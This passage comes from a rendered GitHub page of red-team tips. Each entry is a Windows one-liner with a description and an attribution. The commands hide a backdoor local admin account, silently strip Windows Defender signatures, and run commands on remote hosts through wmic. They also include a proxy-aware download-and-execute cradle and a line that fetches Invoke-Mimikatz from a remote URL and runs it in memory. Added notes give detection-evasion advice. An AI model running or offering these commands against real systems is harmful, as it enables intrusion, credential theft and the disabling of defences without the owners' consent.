href="#hiding-the-local-admin-account"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f"><pre>reg add <span class="pl-s"><span class="pl-pds">"</span>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList<span class="pl-pds">"</span></span> /t REG_DWORD /v alh4zr3d /d 0 /f</pre></div> <p dir="auto"><strong>Description:</strong> <em>'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1612913838999113728" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Cripple windows defender by deleting signatures</h3><a id="user-content-cripple-windows-defender-by-deleting-signatures" class="anchor" aria-label="Permalink: 🔙Cripple windows defender by deleting signatures" 
href="#cripple-windows-defender-by-deleting-signatures"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=""%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"><pre><span class="pl-s"><span class="pl-pds">"</span>%Program Files%\Windows Defender\MpCmdRun.exe<span class="pl-pds">"</span></span> -RemoveDefinitions -All</pre></div> <p dir="auto"><strong>Description:</strong> <em>'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1611005101262389250" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Enable multiple RDP sessions per user</h3><a id="user-content-enable-multiple-rdp-sessions-per-user" class="anchor" aria-label="Permalink: 🔙Enable multiple RDP sessions per user" href="#enable-multiple-rdp-sessions-per-user"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" 
width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f"><pre>reg add <span class="pl-s"><span class="pl-pds">"</span>HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server<span class="pl-pds">"</span></span> /v fSingleSessionPerUser /t REG_DWORD /d 0 /f</pre></div> <p dir="auto"><strong>Note:</strong> The key is <code>Terminal Server</code> with a space, so it has to be quoted; the unspaced <code>TerminalServer</code> found in copies of this one-liner silently creates an empty new key and changes nothing. <code>/t REG_DWORD</code> matters because <code>reg add</code> defaults to <code>REG_SZ</code>. Needs administrator rights; on Windows client editions, which only allow one interactive session, this value alone does not lift that limit.</p> <p dir="auto"><strong>Description:</strong> <em>'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. 
Enable multiple sessions per user.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1609954528425558016" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Sysinternals PsExec.exe local alternative</h3><a id="user-content-sysinternals-psexecexe-local-alternative" class="anchor" aria-label="Permalink: 🔙Sysinternals PsExec.exe local alternative" href="#sysinternals-psexecexe-local-alternative"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command ""><pre>wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c <span class="pl-s"><span class="pl-pds">"</span> command <span class="pl-pds">"</span></span></pre></div> <p dir="auto"><strong>Note:</strong> The <code>/password:</code> value is part of the process command line, so it is captured by anything logging process creation on the source host (Security 4688 with command-line auditing, Sysmon Event 1); give <code>/user:</code> without <code>/password:</code> and wmic should prompt for it instead. On the target the command runs as a child of <code>WmiPrvSE.exe</code>, which is a standard lateral-movement detection. <code>wmic.exe</code> is deprecated and is no longer installed by default on recent Windows 11 builds, so check that it exists before relying on it; <code>Invoke-CimMethod</code> against <code>Win32_Process</code> drives the same WMI path from PowerShell.</p> <p dir="auto"><strong>Description:</strong> <em>'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. 
Try this instead.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/GuhnooPlusLinux" rel="nofollow">@GuhnooPlusLinux</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/GuhnooPlusLinux/status/1607473627922063360" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Live off the land port scanner</h3><a id="user-content-live-off-the-land-port-scanner" class="anchor" aria-label="Permalink: 🔙Live off the land port scanner" href="#live-off-the-land-port-scanner"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$_)) "Port $_ open"} 2>$null"><pre>0..65535 <span class="pl-k">|</span> % {echo <span class="pl-s"><span class="pl-pds">((</span>new<span class="pl-k">-</span>object Net.Sockets.TcpClient).Connect(<span class="pl-k"><</span>tgt_ip<span class="pl-k">>,</span><span class="pl-smi">$_</span><span class="pl-pds">))</span></span> <span class="pl-s"><span class="pl-pds">"</span>Port <span class="pl-smi">$_</span> open<span class="pl-pds">"</span></span>} <span class="pl-k">2></span><span 
class="pl-smi">$null</span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'</em></p> <p dir="auto"><strong>Note:</strong> <code>&lt;tgt_ip&gt;</code> has to be a quoted string (for example <code>"10.1.1.1"</code>). <code>Connect()</code> has no timeout, so every port that is filtered rather than closed blocks for the full TCP connect timeout (roughly 20 s on Windows) — a 0–65535 sweep against a firewalled host can run for days; use <code>BeginConnect()</code> with a short wait, or scan a shortlist of ports. It also completes a full handshake on every open port, so "living off the land" here only avoids dropping a binary: on the wire it looks exactly like a connect scan.</p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1605060950339588096" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Proxy aware PowerShell DownloadString</h3><a id="user-content-proxy-aware-powershell-downloadstring" class="anchor" aria-label="Permalink: 🔙Proxy aware PowerShell DownloadString" href="#proxy-aware-powershell-downloadstring"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")"><pre><span class="pl-smi">$w</span>=(New-Object Net.WebClient)<span class="pl-k">;</span><span class="pl-smi">$w</span>.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials<span class="pl-k">;</span>IEX 
<span class="pl-smi">$w</span>.DownloadString(<span class="pl-s"><span class="pl-pds">"</span><url><span class="pl-pds">"</span></span>)</pre></div> <p dir="auto"><strong>Description:</strong> <em>'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1596192664398966785" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Looking for internal endpoints in browser bookmarks</h3><a id="user-content-looking-for-internal-endpoints-in-browser-bookmarks" class="anchor" aria-label="Permalink: 🔙Looking for internal endpoints in browser bookmarks" href="#looking-for-internal-endpoints-in-browser-bookmarks"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type""><pre><span class="pl-c1">type</span> <span class="pl-s"><span 
class="pl-pds">"</span>C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak<span class="pl-pds">"</span></span> <span class="pl-k">|</span> findstr /c <span class="pl-s"><span class="pl-pds">"</span>name url<span class="pl-pds">"</span></span> <span class="pl-k">|</span> findstr /v <span class="pl-s"><span class="pl-pds">"</span>type<span class="pl-pds">"</span></span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1595488676389171200" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Query DNS records for enumeration</h3><a id="user-content-query-dns-records-for-enumeration" class="anchor" aria-label="Permalink: 🔙Query DNS records for enumeration" href="#query-dns-records-for-enumeration"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Get-DnsRecord -RecordType A 
-ZoneName FQDN -Server <server hostname>"><pre>Get-DnsRecord -RecordType A -ZoneName FQDN -Server <span class="pl-k"><</span>server hostname<span class="pl-k">></span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'</em></p> <p dir="auto"><strong>Note:</strong> <code>Get-DnsRecord</code> is not a stock Windows cmdlet, so check which module the host actually has before expecting this to run. With the DnsServer RSAT module the built-in equivalent is <code>Get-DnsServerResourceRecord -RRType A -ZoneName your.zone -ComputerName dns-server</code>, which uses the DNS management interface and typically needs management rights on that server. If you only hold ordinary domain-user rights, the same AD-integrated zone data is generally readable over LDAP from the domain DNS partitions. Either way it is one remote call to the DC rather than a sweep, but it is still a connection that can be logged.</p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1587132627823181824" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Unquoted service paths without PowerUp</h3><a id="user-content-unquoted-service-paths-without-powerup" class="anchor" aria-label="Permalink: 🔙Unquoted service paths without PowerUp" href="#unquoted-service-paths-without-powerup"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select 
PathName,DisplayName,Name"><pre>Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode <span class="pl-k">|</span> Where {<span class="pl-smi">$_</span>.StartMode -eq <span class="pl-s"><span class="pl-pds">"</span>Auto<span class="pl-pds">"</span></span> -and <span class="pl-smi">$_</span>.PathName -notlike <span class="pl-s"><span class="pl-pds">"</span>C:\Windows*<span class="pl-pds">"</span></span> -and <span class="pl-smi">$_</span>.PathName -notlike <span class="pl-s"><span class="pl-pds">'</span>"*<span class="pl-pds">'</span></span>} <span class="pl-k">|</span> <span class="pl-k">select</span> <span class="pl-smi">PathName,DisplayName,Name</span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'Finding unquoted service paths without PowerUp'</em></p> <p dir="auto"><strong>Note:</strong> The last filter only drops paths that begin with a quote; it never checks for a space, so every unquoted auto-start service outside <code>C:\Windows</code> is listed, including ones whose path has no spaces and is therefore not exploitable. Add <code>-and $_.PathName -like "* *"</code> (or look for a space before the <code>.exe</code>) to narrow the output, then confirm you can actually create a file in one of the intermediate directories — an unquoted path is only useful when that write is possible and the service runs as a more privileged account.</p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1579254955554136064" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Bypass a disabled command prompt with /k</h3><a id="user-content-bypass-a-disabled-command-prompt-with-k" class="anchor" aria-label="Permalink: 🔙Bypass a disabled command prompt with /k" href="#bypass-a-disabled-command-prompt-with-k"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 
1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Win+R (To bring up Run Box) cmd.exe /k "whoami""><pre><span class="pl-c"><span class="pl-c">#</span> Win+R (To bring up Run Box)</span> cmd.exe /k <span class="pl-s"><span class="pl-pds">"</span>whoami<span class="pl-pds">"</span></span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'This command prompt has been disabled by your administrator...' Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use /k via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.</em></p> <p dir="auto"><strong>Credit:</strong> Martin Sohn Christensen</p> <p dir="auto"><strong>Link:</strong> <a href="https://improsec.com/tech-blog/the-command-prompt-has-been-disabled-by-your-administrator-press-any-key-to-continue-or-use-these-weird-tricks-to-bypass-admins-will-hate-you" rel="nofollow">Blog</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Stop windows defender deleting mimikatz.exe</h3><a id="user-content-stop-windows-defender-deleting-mimikatzexe" class="anchor" aria-label="Permalink: 🔙Stop windows defender deleting mimikatz.exe" href="#stop-windows-defender-deleting-mimikatzexe"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 
1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;Invoke-Mimikatz"><pre>(new-object net.webclient).downloadstring(<span class="pl-s"><span class="pl-pds">'</span>https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1<span class="pl-pds">'</span></span>)<span class="pl-k">|</span>IEX<span class="pl-k">;</span>Invoke-Mimikatz</pre></div> <p dir="auto"><strong>Description:</strong> <em>'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'</em></p> <p dir="auto"><strong>Note:</strong> The URL is deliberately defanged (<code>[.]</code>) and has to be restored before it will resolve. Call the function by its full name, <code>Invoke-Mimikatz</code> — PowerShell does not expand a partial command name like <code>inv</code> at run time. Loading the script straight into memory avoids the on-disk detection of <code>mimikatz.exe</code>, nothing more: the script text still passes through AMSI on its way into <code>IEX</code> and is recorded by script block logging (4104), and this Empire copy is widely signatured, so on a host with a current Defender expect it to be blocked unless the script is modified or AMSI is dealt with first.</p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/GuhnooPlusLinux" rel="nofollow">@GuhnooPlusLinux</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/GuhnooPlusLinux/status/1605629049660809216" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Check if you are in a virtual machine</h3><a id="user-content-check-if-you-are-in-a-virtual-machine" class="anchor" aria-label="Permalink: 🔙Check if you are in a virtual machine" href="#check-if-you-are-in-a-virtual-machine"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 
1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="reg query HKLM\SYSTEM /s | findstr /I "VirtualBox VBOX VMware""><pre>reg query HKLM<span class="pl-cce">\S</span>YSTEM /s <span class="pl-k">|</span> findstr /I <span class="pl-s"><span class="pl-pds">"</span>VirtualBox VBOX VMware<span class="pl-pds">"</span></span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'</em></p> <p dir="auto"><strong>Note:</strong> <code>findstr</code> matches case-sensitively by default and <code>/S</code> only affects file searches, so the earlier <code>findstr /S "… VMWare"</code> form would miss the usual <code>VMware</code> spelling that appears in the registry; <code>/I</code> makes the match case-insensitive. Each space-separated word inside the quotes is a separate search term. Treat a hit as a strong hint rather than proof: a physical host with VMware Workstation or VirtualBox installed carries the same strings under <code>Services</code>, and dumping the whole <code>SYSTEM</code> hive is slow and conspicuous — <code>systeminfo</code> (System Manufacturer / System Model) or <code>Get-CimInstance Win32_ComputerSystem</code> is a quicker and quieter first check.</p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/dmcxblue" rel="nofollow">@dmcxblue</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/dmcxblue/status/1366779034672136194" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Enumerate AppLocker rules</h3><a id="user-content-enumerate-applocker-rules" class="anchor" aria-label="Permalink: 🔙Enumerate AppLocker rules" href="#enumerate-applocker-rules"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 